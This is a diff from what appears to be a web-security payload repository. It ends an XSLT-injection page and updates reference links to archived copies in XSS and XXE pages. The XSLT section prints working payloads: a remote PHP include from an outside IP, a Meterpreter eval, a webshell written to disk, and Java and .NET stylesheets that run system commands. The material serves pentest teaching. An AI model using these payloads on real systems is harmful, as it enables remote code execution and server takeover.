+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
+  <xsl:template match="/">
+    <xsl:value-of name="assert" select="php:function('scandir', '.')"/>
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+Execute a remote php file using `assert`
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
+  <xsl:variable name="payload">
+    include("http://10.10.10.10/test.php")
+  </xsl:variable>
+  <xsl:variable name="include" select="php:function('assert',$payload)"/>
+</body>
+</html>
+```
+
+Execute a PHP meterpreter using PHP wrapper.
+
+```xml
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
+  <xsl:template match="/">
+    <xsl:variable name="eval">
+      eval(base64_decode('Base64-encoded Meterpreter code'))
+    </xsl:variable>
+    <xsl:variable name="preg" select="php:function('preg_replace', '/.*/e', $eval, '')"/>
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+Execute a remote php file using `file_put_contents`
+
+```xml
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
+  <xsl:template match="/">
+    <xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','&lt;?php echo system($_GET[&quot;command&quot;]); ?&gt;')" />
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+### Remote Code Execution with Java
+
+```xml
+  <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
+    <xsl:template match="/">
+      <xsl:variable name="rtobject" select="rt:getRuntime()"/>
+      <xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
+      <xsl:variable name="processString" select="ob:toString($process)"/>
+      <xsl:value-of select="$processString"/>
+    </xsl:template>
+  </xsl:stylesheet>
+```
+
+```xml
+<xml version="1.0"?>
+<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:java="http://saxon.sf.net/java-type">
+<xsl:template match="/">
+<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'cmd.exe /C ping IP')" xmlns:Runtime="java:java.lang.Runtime"/>
+</xsl:template>.
+</xsl:stylesheet>
+```
+
+### Remote Code Execution with Native .NET
+
+```xml
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App">
+    <msxsl:script implements-prefix="App" language="C#">
+      <![CDATA[
+        public string ToShortDateString(string date)
+          {
+              System.Diagnostics.Process.Start("cmd.exe");
+              return "01/01/2001";
+          }
+      ]]>
+    </msxsl:script>
+    <xsl:template match="ArrayOfTest">
+      <TABLE>
+        <xsl:for-each select="Test">
+          <TR>
+          <TD>
+            <xsl:value-of select="App:ToShortDateString(TestDate)" />
+          </TD>
+          </TR>
+        </xsl:for-each>
+      </TABLE>
+    </xsl:template>
+</xsl:stylesheet>
+```
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+xmlns:msxsl="urn:schemas-microsoft-com:xslt"
+xmlns:user="urn:my-scripts">
+
+<msxsl:script language = "C#" implements-prefix = "user">
+<![CDATA[
+public string execute(){
+System.Diagnostics.Process proc = new System.Diagnostics.Process();
+proc.StartInfo.FileName= "C:\\windows\\system32\\cmd.exe";
+proc.StartInfo.RedirectStandardOutput = true;
+proc.StartInfo.UseShellExecute = false;
+proc.StartInfo.Arguments = "/c dir";
+proc.Start();
+proc.WaitForExit();
+return proc.StandardOutput.ReadToEnd();
+}
+]]>
+</msxsl:script>
+
+  <xsl:template match="/fruits">
+  --- BEGIN COMMAND OUTPUT ---
+ <xsl:value-of select="user:execute()"/>
+  --- END COMMAND OUTPUT --- 
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+## Labs
+
+- [Root Me - XSLT - Code execution](https://www.root-me.org/en/Challenges/Web-Server/XSLT-Code-execution)
+
+## References
+
+- [From XSLT code execution to Meterpreter shells - Nicolas Grégoire (@agarri) - July 2, 2012](https://web.archive.org/web/20190820014239/https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
+- [XSLT Injection - Fortify - January 16, 2021](http://web.archive.org/web/20210116001237/https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
+- [XSLT Injection Basics - Saxon - Hunnic Cyber Team - August 21, 2019](http://web.archive.org/web/20190821174700/https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
+- [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - May 22, 2024](https://web.archive.org/web/20260121165846/https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/)
+- [XSLT injection lead to file creation - PT SWARM (@ptswarm) - May 30, 2024](https://web.archive.org/web/20241006180803/https://twitter.com/ptswarm/status/1796162911108255974/photo/1)
diff --git a/XSS Injection/1 - XSS Filter Bypass.md b/XSS Injection/1 - XSS Filter Bypass.md
index fe307d1..97df353 100644
--- a/XSS Injection/1 - XSS Filter Bypass.md	
+++ b/XSS Injection/1 - XSS Filter Bypass.md	
@@ -575,4 +575,4 @@ Bypass using [jsfuck](http://www.jsfuck.com/)
 
 ## References
 
-- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)
+- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://web.archive.org/web/20170330144550/https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)
diff --git a/XSS Injection/2 - XSS Polyglot.md b/XSS Injection/2 - XSS Polyglot.md
index daa4a57..cdee916 100644
--- a/XSS Injection/2 - XSS Polyglot.md	
+++ b/XSS Injection/2 - XSS Polyglot.md	
@@ -82,5 +82,5 @@ A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work
 
 ## References
 
-* [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/)
+* [Building XSS Polyglots - Brute - June 23, 2021](https://web.archive.org/web/20210623151016/https://brutelogic.com.br/blog/building-xss-polyglots/)
 * [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)
diff --git a/XSS Injection/4 - CSP Bypass.md b/XSS Injection/4 - CSP Bypass.md
index 9fed2a5..84d6e9a 100644
--- a/XSS Injection/4 - CSP Bypass.md	
+++ b/XSS Injection/4 - CSP Bypass.md	
@@ -173,7 +173,7 @@ Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
 
 ## References
 
-- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)
+- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://web.archive.org/web/20170330144550/https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)
 - [D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - June 27, 2017](http://web.archive.org/web/20170627043828/https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf)
-- [How to use Google’s CSP Evaluator to bypass CSP - Thomas Orlita - September 9, 2018](https://websecblog.com/vulns/google-csp-evaluator/)
-- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - April 6, 2020](https://www.buaq.net/go-25883.html)
+- [How to use Google’s CSP Evaluator to bypass CSP - Thomas Orlita - September 9, 2018](https://web.archive.org/web/20260220005424/https://websecblog.com/vulns/google-csp-evaluator/)
+- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - April 6, 2020](https://web.archive.org/web/20260226005506/https://www.buaq.net/go-25883.html)
diff --git a/XSS Injection/5 - XSS in Angular.md b/XSS Injection/5 - XSS in Angular.md
index 0cebb1f..f86ad59 100644
--- a/XSS Injection/5 - XSS in Angular.md	
+++ b/XSS Injection/5 - XSS in Angular.md	
@@ -337,7 +337,7 @@ When doing a code review, you want to make sure that no user input is being trus
 ## References
 
 * [Angular Security - May 16, 2023](https://angular.io/guide/security)
-* [Bidding Like a Billionaire - Stealing NFTs With 4-Char CSTIs - Matan Berson (@MtnBer) - July 11, 2024](https://matanber.com/blog/4-char-csti)
+* [Bidding Like a Billionaire - Stealing NFTs With 4-Char CSTIs - Matan Berson (@MtnBer) - July 11, 2024](https://web.archive.org/web/20250118075113/https://matanber.com/blog/4-char-csti)
 * [Blind XSS AngularJS Payloads - Lewis Ardern - December 7, 2018](http://web.archive.org/web/20181209041100/https://ardern.io/2018/12/07/angularjs-bxss/)
-* [Bypass DomSanitizer - Swarna (@swarnakishore) - August 11, 2017](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b)
-* [XSS without HTML - CSTI with Angular JS - Gareth Heyes (@garethheyes) - January 27, 2016](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
+* [Bypass DomSanitizer - Swarna (@swarnakishore) - August 11, 2017](https://web.archive.org/web/20250908023652/https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b)
+* [XSS without HTML - CSTI with Angular JS - Gareth Heyes (@garethheyes) - January 27, 2016](https://web.archive.org/web/20190331015852/https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index d42f59b..94fb730 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -567,43 +567,43 @@ Use browsers quirks to recreate some HTML tags.
 
 ## References
 
-- [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212) - Masato Kinugawa's (@kinugawamasato) - July 15, 2016](http://mksben.l0.cm/2016/07/xxn-caret.html)
-- [Account Recovery XSS - Gábor Molnár - April 13, 2016](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss)
-- [An XSS on Facebook via PNGs & Wonky Content Types - Jack Whitton (@fin1te) - January 27, 2016](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
-- [Bypassing Signature-Based XSS Filters: Modifying Script Code - PortSwigger - August 4, 2020](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
-- [Combination of techniques lead to DOM Based XSS in Google - Sasi Levi - September 19, 2016](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html)
-- [Cross-site scripting (XSS) cheat sheet - PortSwigger - September 27, 2019](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
-- [Encoding Differentials: Why Charset Matters - Stefan Schiller - July 15, 2024](https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/)
-- [Facebook's Moves - OAuth XSS - Paulos Yibelo - December 10, 2015](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html)
-- [Frans Rosén on how he got Bug Bounty for Mega.co.nz XSS - Frans Rosén - February 14, 2013](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/)
-- [Google XSS Turkey - Frans Rosén - June 6, 2015](https://labs.detectify.com/2015/06/06/google-xss-turkey/)
-- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g)
-- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - May 2012](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
-- [Mutation XSS in Google Search -  Tomasz Andrzej Nidecki - April 10, 2019](https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/)
-- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013](https://cure53.de/fp170.pdf)
-- [postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
+- [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212) - Masato Kinugawa's (@kinugawamasato) - July 15, 2016](https://web.archive.org/web/20260208084714/https://mksben.l0.cm/2016/07/xxn-caret.html)
+- [Account Recovery XSS - Gábor Molnár - April 13, 2016](https://web.archive.org/web/20241005040655/https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss)
+- [An XSS on Facebook via PNGs & Wonky Content Types - Jack Whitton (@fin1te) - January 27, 2016](https://web.archive.org/web/20171108050241/https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
+- [Bypassing Signature-Based XSS Filters: Modifying Script Code - PortSwigger - August 4, 2020](https://web.archive.org/web/20251008035916/https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
+- [Combination of techniques lead to DOM Based XSS in Google - Sasi Levi - September 19, 2016](https://web.archive.org/web/20180214031830/https://sasi2103.blogspot.sg:80/2016/09/combination-of-techniques-lead-to-dom.html)
+- [Cross-site scripting (XSS) cheat sheet - PortSwigger - September 27, 2019](https://web.archive.org/web/20190927102245/https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
+- [Encoding Differentials: Why Charset Matters - Stefan Schiller - July 15, 2024](https://web.archive.org/web/20240715192800/https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/)
+- [Facebook's Moves - OAuth XSS - Paulos Yibelo - December 10, 2015](https://web.archive.org/web/20180508031244/https://www.paulosyibelo.com:80/2015/12/facebooks-moves-oauth-xss.html)
+- [Frans Rosén on how he got Bug Bounty for Mega.co.nz XSS - Frans Rosén - February 14, 2013](https://web.archive.org/web/20231004090825/https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/)
+- [Google XSS Turkey - Frans Rosén - June 6, 2015](https://web.archive.org/web/20231004100309/https://labs.detectify.com/2015/06/06/google-xss-turkey/)
+- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017](https://web.archive.org/web/20260304011652/https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff)
+- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - May 2012](https://web.archive.org/web/20140926052901/http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
+- [Mutation XSS in Google Search -  Tomasz Andrzej Nidecki - April 10, 2019](https://web.archive.org/web/20260305093221/https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/)
+- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013](https://web.archive.org/web/20250901044759/https://cure53.de/fp170.pdf)
+- [postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016](https://web.archive.org/web/20231004103135/https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
 - [RPO that lead to information leakage in Google - @filedescriptor - July 3, 2016](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/)
-- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - May 13, 2024](https://youtu.be/Sm4G6cAHjWM)
-- [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP - Frans Rosén (fransrosen) - February 17, 2017](https://hackerone.com/reports/207042)
+- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - May 13, 2024](https://web.archive.org/web/20260105121400/https://youtu.be/Sm4G6cAHjWM)
+- [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP - Frans Rosén (fransrosen) - February 17, 2017](https://web.archive.org/web/20251111110702/https://hackerone.com/reports/207042)
 - [Stored XSS affecting all fantasy sports [*.fantasysports.yahoo.com] - thedawgyg - December 7, 2016](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/)
-- [Stored XSS in *.ebay.com - Jack Whitton (@fin1te) - January 27, 2013](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/)
+- [Stored XSS in *.ebay.com - Jack Whitton (@fin1te) - January 27, 2013](https://web.archive.org/web/20260117011606/https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/)
 - [Stored XSS In Facebook Chat, Check In, Facebook Messenger - Nirgoldshlager - April 17, 2013](http://web.archive.org/web/20130420095223/http://www.breaksec.com/?p=6129)
-- [Stored XSS on developer.uber.com via admin account compromise in Uber - James Kettle (@albinowax) - July 18, 2016](https://hackerone.com/reports/152067)
-- [Stored XSS on Snapchat - Mrityunjoy - February 9, 2018](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
-- [Stored XSS, and SSRF in Google using the Dataset Publishing Language - Craig Arendt - March 7, 2018](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
-- [Tricky HTML Injection and Possible XSS in sms-be-vip.twitter.com - Ahmed Aboul-Ela (@aboul3la) - July 9, 2016](https://hackerone.com/reports/150179)
-- [Twitter XSS by stopping redirection and javascript scheme - Sergey Bobrov (bobrov) - September 30, 2017](https://hackerone.com/reports/260744)
-- [Uber Bug Bounty: Turning Self-XSS into Good XSS - Jack Whitton (@fin1te) - March 22, 2016](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/)
-- [Uber Self XSS to Global XSS - httpsonly - August 29, 2016](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html)
+- [Stored XSS on developer.uber.com via admin account compromise in Uber - James Kettle (@albinowax) - July 18, 2016](https://web.archive.org/web/20251219005750/https://hackerone.com/reports/152067)
+- [Stored XSS on Snapchat - Mrityunjoy - February 9, 2018](https://web.archive.org/web/20250117225022/https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
+- [Stored XSS, and SSRF in Google using the Dataset Publishing Language - Craig Arendt - March 7, 2018](https://web.archive.org/web/20180307213445/https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
+- [Tricky HTML Injection and Possible XSS in sms-be-vip.twitter.com - Ahmed Aboul-Ela (@aboul3la) - July 9, 2016](https://web.archive.org/web/20250705123701/https://hackerone.com/reports/150179)
+- [Twitter XSS by stopping redirection and javascript scheme - Sergey Bobrov (bobrov) - September 30, 2017](https://web.archive.org/web/20251206162237/https://hackerone.com/reports/260744)
+- [Uber Bug Bounty: Turning Self-XSS into Good XSS - Jack Whitton (@fin1te) - March 22, 2016](https://web.archive.org/web/20260301051605/https://whitton.io/articles/uber-turning-self-xss-into-good-xss/)
+- [Uber Self XSS to Global XSS - httpsonly - August 29, 2016](https://web.archive.org/web/20180701015455/https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html)
 - [Unleashing an Ultimate XSS Polyglot - Ahmed Elsobky - February 16, 2018](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
 - [Using a Braun Shaver to Bypass XSS Audit and WAF - Frans Rosen - April 19, 2016](http://web.archive.org/web/20160810033728/https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify)
 - [Ways to alert(document.domain) - Tom Hudson (@tomnomnom) - February 22, 2018](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)
-- [Write-up of DOMPurify 2.0.0 bypass using mutation XSS - Michał Bentkowski - September 20, 2019](https://research.securitum.com/dompurify-bypass-using-mxss/)
-- [XSS by Tossing Cookies - WeSecureApp - July 10, 2017](https://wesecureapp.com/blog/xss-by-tossing-cookies/)
-- [XSS ghettoBypass - d3adend - September 25, 2015](http://d3adend.org/xss/ghettoBypass)
-- [XSS in Uber via Cookie - zhchbin - August 30, 2017](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/)
-- [XSS on any Shopify shop via abuse of the HTML5 structured clone algorithm in postMessage listener - Luke Young (bored-engineer) - May 23, 2017](https://hackerone.com/reports/231053)
-- [XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
-- [Xssing Web With Unicodes - Rakesh Mane - August 3, 2017](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
-- [Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016](https://klikki.fi/adv/yahoo.html)
-- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html)
+- [Write-up of DOMPurify 2.0.0 bypass using mutation XSS - Michał Bentkowski - September 20, 2019](https://web.archive.org/web/20250810032340/https://research.securitum.com/dompurify-bypass-using-mxss/)
+- [XSS by Tossing Cookies - WeSecureApp - July 10, 2017](https://web.archive.org/web/20260107083030/https://wesecureapp.com/blog/xss-by-tossing-cookies/)
+- [XSS ghettoBypass - d3adend - September 25, 2015](https://web.archive.org/web/20150925094640/http://d3adend.org:80/xss/ghettoBypass)
+- [XSS in Uber via Cookie - zhchbin - August 30, 2017](https://web.archive.org/web/20260206200641/https://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/)
+- [XSS on any Shopify shop via abuse of the HTML5 structured clone algorithm in postMessage listener - Luke Young (bored-engineer) - May 23, 2017](https://web.archive.org/web/20260216061600/https://hackerone.com/reports/231053)
+- [XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015](https://web.archive.org/web/20150503190425/http://blog.bentkowski.info:80/2015/04/xss-via-host-header-cse.html)
+- [Xssing Web With Unicodes - Rakesh Mane - August 3, 2017](https://web.archive.org/web/20260217134740/https://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
+- [Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016](https://web.archive.org/web/20210507223107/https://klikki.fi/adv/yahoo.html)
+- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://web.archive.org/web/20210816155224/https://klikki.fi/adv/yahoo2.html)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index eb64267..cb7d559 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -659,30 +659,30 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
 
 ## References
 
-- [A Deep Dive into XXE Injection - Trenton Gordon - July 22, 2019](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/)
-- [Automating local DTD discovery for XXE exploitation - Philippe Arteau - July 16, 2019](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
-- [Blind OOB XXE At UBER 26+ Domains Hacked - Raghav Bisht - August 5, 2016](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html)
-- [CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server - Julien Szlamowicz, Sebastien Dudek - March 11, 2019](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf)
-- [Data exfiltration using XXE on a hardened server - Ritik Singh - January 29, 2022](https://infosecwriteups.com/data-exfiltration-using-xxe-on-a-hardened-server-ef3a3e5893ac)
-- [Detecting and exploiting XXE in SAML Interfaces - Christian Mainka (@CheariX) - November 6, 2014](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
-- [Exploiting XXE in file upload functionality - Will Vandevanter (@_will_is_) - November 19, 2015](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
-- [EXPLOITING XXE WITH EXCEL - Marc Wickenden - November 12, 2018](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
-- [Exploiting XXE with local DTD files - Arseniy Sharoglazov - December 12, 2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
-- [From blind XXE to root-level file read access - Pieter Hiele - December 12, 2018](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)
-- [How we got read access on Google’s production servers - Detectify - April 11, 2014](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/)
-- [Impossible XXE in PHP - Aleksandr Zhurnakov - March 11, 2025](https://swarm.ptsecurity.com/impossible-xxe-in-php/)
-- [Midnight Sun CTF 2019 Quals - Rubenscube - jbz - April 6, 2019](https://jbz.team/midnightsunctfquals2019/Rubenscube)
-- [OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
-- [Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
-- [Pentest XXE - @phonexicum - March 9, 2020](https://phonexicum.github.io/infosec/xxe.html)
-- [Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/)
-- [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024](https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe)
+- [A Deep Dive into XXE Injection - Trenton Gordon - July 22, 2019](https://web.archive.org/web/20250511144639/https://www.synack.com/blog/a-deep-dive-into-xxe-injection/)
+- [Automating local DTD discovery for XXE exploitation - Philippe Arteau - July 16, 2019](https://web.archive.org/web/20240119113458/https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation/)
+- [Blind OOB XXE At UBER 26+ Domains Hacked - Raghav Bisht - August 5, 2016](https://web.archive.org/web/20180215154806/https://nerdint.blogspot.hk:80/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html)
+- [CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server - Julien Szlamowicz, Sebastien Dudek - March 11, 2019](https://web.archive.org/web/20191231121853/https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf)
+- [Data exfiltration using XXE on a hardened server - Ritik Singh - January 29, 2022](https://web.archive.org/web/20221121024329/https://infosecwriteups.com/data-exfiltration-using-xxe-on-a-hardened-server-ef3a3e5893ac)
+- [Detecting and exploiting XXE in SAML Interfaces - Christian Mainka (@CheariX) - November 6, 2014](https://web.archive.org/web/20251209035938/http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
+- [Exploiting XXE in file upload functionality - Will Vandevanter (@_will_is_) - November 19, 2015](https://web.archive.org/web/20260306153214/https://blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
+- [EXPLOITING XXE WITH EXCEL - Marc Wickenden - November 12, 2018](https://web.archive.org/web/20260129040336/https://www.4armed.com/blog/exploiting-xxe-with-excel/)
+- [Exploiting XXE with local DTD files - Arseniy Sharoglazov - December 12, 2018](https://web.archive.org/web/20181213212434/https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
+- [From blind XXE to root-level file read access - Pieter Hiele - December 12, 2018](https://web.archive.org/web/20181212171659/https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)
+- [How we got read access on Google’s production servers - Detectify - April 11, 2014](https://web.archive.org/web/20230902033341/https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/)
+- [Impossible XXE in PHP - Aleksandr Zhurnakov - March 11, 2025](https://web.archive.org/web/20260131091306/https://swarm.ptsecurity.com/impossible-xxe-in-php/)
+- [Midnight Sun CTF 2019 Quals - Rubenscube - jbz - April 6, 2019](https://web.archive.org/web/20260302041500/https://jbz.team/midnightsunctfquals2019/Rubenscube)
+- [OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016](https://web.archive.org/web/20170205151900/https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
+- [Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016](https://web.archive.org/web/20181213212434/https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
